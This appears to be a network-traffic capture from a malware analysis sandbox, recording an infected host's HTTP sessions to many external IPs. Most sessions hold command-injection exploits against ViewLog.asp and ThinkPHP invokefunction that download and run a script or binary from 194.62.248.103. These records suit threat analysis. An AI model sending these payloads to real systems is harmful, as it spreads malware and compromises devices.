                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        932192.168.2.235670095.217.45.3680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:19.581870079 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:19.905539989 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        933192.168.2.236019831.136.17.2358080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:20.100747108 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:21.106019020 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:23.089864969 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:27.217207909 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:35.152028084 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:51.021962881 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:23.785686970 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        934192.168.2.234909094.120.163.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:20.121088982 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        935192.168.2.234625494.120.219.2058080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:20.128559113 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        936192.168.2.235199694.123.146.1828080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:20.129055023 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        937192.168.2.235950895.86.114.2478080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:20.134062052 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        938192.168.2.233514295.86.104.708080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:20.139411926 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        939192.168.2.234642485.235.32.188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:20.145021915 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:20.505675077 CEST1254INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: ru
                                                        Content-Length: 1117
                                                        Date: Sun, 14 Apr 2024 14:37:20 GMT
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 32 30 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="ru"><head><title>HTTP Status 404 </title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 </h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.20</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        940192.168.2.235375462.234.214.2438080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:20.417851925 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:20.735483885 CEST1246INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 1097
                                                        Date: Sun, 14 Apr 2024 14:37:20 GMT
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 34 30 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.40</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        941192.168.2.235228031.136.168.1078080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:20.418133974 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:21.394123077 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
